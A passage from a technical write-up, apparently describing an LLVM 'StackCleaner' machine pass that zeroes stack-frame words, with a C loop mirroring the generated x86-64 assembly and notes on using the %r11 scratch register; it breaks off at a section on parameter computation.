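 * mirroring movq $0, OFFSET(%rsp,%r11,8) as %r11 counts down. */
void clean_frame_words(uint64_t* base, uint64_t qsize)
{
  for (uint64_t i = qsize; i != 0; --i)  /* subq $1, %r11; jne .Lloop */
    base[i] = 0;
}
```

Note that base[0] (the word at OFFSET itself) is deliberately left untouched: the counter stops when it reaches zero, just as the `jne` falls through.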

\n

%r11 is defined by the System V x86-64 ABI (as well as the Windows ABI) as a scratch register: at the beginning of the function, we are free to use it without saving it first.

\n

LLVM pass

\n

This is implemented by a StackCleaner machine pass whose\nrunOnMachineFunction() works similarly to the NopInserter pass.

\n

Parameter computation

\n

We compute the parameters of the generated native code from the size of the stack frame:

\n\n
int</